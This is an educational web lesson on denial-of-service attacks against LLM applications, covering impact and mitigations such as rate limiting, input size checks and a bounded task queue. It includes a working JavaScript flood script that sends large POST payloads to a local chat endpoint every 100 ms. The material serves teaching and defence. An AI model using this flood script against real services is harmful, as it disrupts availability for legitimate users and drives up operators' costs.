Denial of service
Bringing down an LLM with DoS
AI/ML
What is a denial of service attack?
A denial of service (DoS) attack is an attack in which an adversary makes a network service or digital system unavailable by overloading it with bogus internet traffic, thus denying service to legitimate users. It impacts the availability of the application or system.
Imagine an attacker orchestrating this attack by flooding ChatGPT's servers with overwhelming fake internet traffic. This is not an attempt to steal data but rather an effort to sap the system's resources, leading to operational disruptions and making ChatGPT unavailable for genuine users. To draw a parallel, it's as if someone is blocking the entrance to a store, preventing customers from coming in. While the store's goods remain untouched, its functionality is severely compromised. In the case of a web-based AI tool, a single attacker's system might not be sufficient for a successful DoS attack. Thus, the attacker might coordinate multiple systems to simultaneously target this AI tool, creating a distributed denial of service (DDoS) attack.
About this lesson
In this lesson, we will learn how denial of service (DoS) attacks work, why they occur, and how to prevent them. We will start by performing a DoS attack on an application, impacting the availability of resources for its end users. We'll then dive into the vulnerable code that allowed us to perform the attack and finish by fixing it up.
First, let's look at the piece of code that was vulnerable:
Now, let's take a look at the code for the exploit. The code above in the "in action" section was only a snippet. This script will send a POST request to the server every 100 milliseconds (as specified by REQUEST_INTERVAL_MS) for a total duration of 10 seconds (as specified by ATTACK_DURATION_MS). Each request contains a simple string payload, but in a real exploit, this could be tailored to maximize the impact on the server.
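A hedged reconstruction of the script described above might look like the following. It assumes the vulnerable server runs on localhost:3000 and uses Node 18+ (for the built-in fetch); the payload size is an illustrative choice.

```javascript
// Illustrative flood script: hammers the endpoint with POST requests.
const REQUEST_INTERVAL_MS = 100;  // one request every 100 ms
const ATTACK_DURATION_MS = 10000; // stop after 10 seconds

function sendRequest() {
  // fetch is built into Node 18+; the payload is a simple string,
  // but a real exploit would tune it to maximize server-side work.
  fetch('http://localhost:3000/chat', {
    method: 'POST',
    body: 'A'.repeat(100000),
  }).catch(() => { /* ignore errors; keep flooding */ });
}

const timer = setInterval(sendRequest, REQUEST_INTERVAL_MS);
const stopTimer = setTimeout(() => clearInterval(timer), ATTACK_DURATION_MS);
```

Note that a single machine running this script may only degrade the service; coordinating many machines turns it into the DDoS scenario described earlier.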
After sending the requests, we observed that the exploit degraded the application's availability for another user, which could create a massive bottleneck for the application's legitimate use.
What is the impact of resource exhaustion through denial of service?
Denial of service (DoS) attacks can have significant and multifaceted impacts on an organization and its services. In the example above, it is only a beta application running locally, but if this were in production, it would cause significant outages for all users.
As we can see, a successful DoS attack can render the service completely inaccessible to legitimate users, leading to downtime. If the LLM is a critical part of business operations, the attack can halt or significantly slow down those operations, leading to lost revenue. For instance, if the LLM is used for customer service, content generation, or decision-making, the disruption can have immediate financial implications.
LLMs often run on cloud platforms that charge based on resource usage. A DoS attack can exponentially increase the computational resources consumed (like CPU, memory, network bandwidth), leading to a spike in cloud hosting costs. Even if the service doesn't go completely offline, its performance can be severely degraded. This results in slow response times and potentially partial unavailability, frustrating users and harming the user experience.
If the LLM is accessed via an API, like in our example, a DoS attack might lead to hitting rate limits, resulting in legitimate requests being blocked or slowed down. Managing and scaling the API to handle such spikes in traffic can incur additional costs.
While a DoS attack typically aims at disrupting service rather than stealing data, the chaos it creates can sometimes be used as a smokescreen for more malicious activities, like data breaches or the installation of malware.
When writing code, we need to ensure it can handle resources safely and mitigate the risk of denial of service (DoS) attacks. A crucial step is implementing strict validation and sanitization of user inputs. This ensures that inputs adhere to expected formats and sizes, filtering out excessively large or malformed inputs that could strain the LLM. Limiting the number of tasks queued for the LLM and the total number of actions processed in response to LLM outputs is also important. Doing so prevents the system from becoming overwhelmed with pending tasks.
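As an illustration of the queued-task cap mentioned above, here is a minimal sketch of a bounded in-process queue. The class name, limits, and load-shedding behavior are hypothetical, not from the lesson's code.

```javascript
// A minimal bounded task queue: reject new work once the backlog
// reaches maxPending instead of letting it grow without bound.
class BoundedQueue {
  constructor(maxPending) {
    this.maxPending = maxPending;
    this.tasks = [];
  }

  enqueue(task) {
    if (this.tasks.length >= this.maxPending) {
      return false; // shed load: the caller should respond with HTTP 429
    }
    this.tasks.push(task);
    return true;
  }

  dequeue() {
    return this.tasks.shift();
  }
}

const queue = new BoundedQueue(2);
console.log(queue.enqueue('prompt-1')); // true
console.log(queue.enqueue('prompt-2')); // true
console.log(queue.enqueue('prompt-3')); // false: backlog full, request rejected
```

Rejecting work early like this keeps memory and LLM capacity bounded even when an attacker floods the endpoint.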
There should also be continuous monitoring of the LLM's resource usage for unusual patterns or spikes. Employing anomaly detection systems can automate this monitoring process.
Having fallback mechanisms or redundancy plans in place is also crucial. In the event of an attack, these mechanisms ensure continued service availability, even if with reduced capabilities. Lastly, utilizing cloud-based auto-scaling features that adjust computational resources based on current demand can help handle sudden spikes in usage without requiring manual intervention.
The vulnerability in the code example above can be mitigated in the following way:
The code above has some changes to make it more secure:
Rate limiting: The express-rate-limit middleware limits the number of requests a single IP can make. This prevents an attacker from sending too many requests in a short period.
Input validation and size limitation: The code now checks if the input data exists, is a string, and does not exceed a specified size (5000 characters in this example). This prevents the server from processing excessively large or invalid inputs.
Asynchronous processing: The processDataAsync function now handles data processing asynchronously, preventing the blocking of the Node.js event loop. This ensures that the server remains responsive even under heavy load.
Test your knowledge!
Keep learning
Learn more about denial of service and other LLM vulnerabilities.
- OWASP slides about their new LLM top 10 list
- The dedicated OWASP page for LLM04: Model Denial of Service
- A Snyk publication on the OWASP LLM top 10 list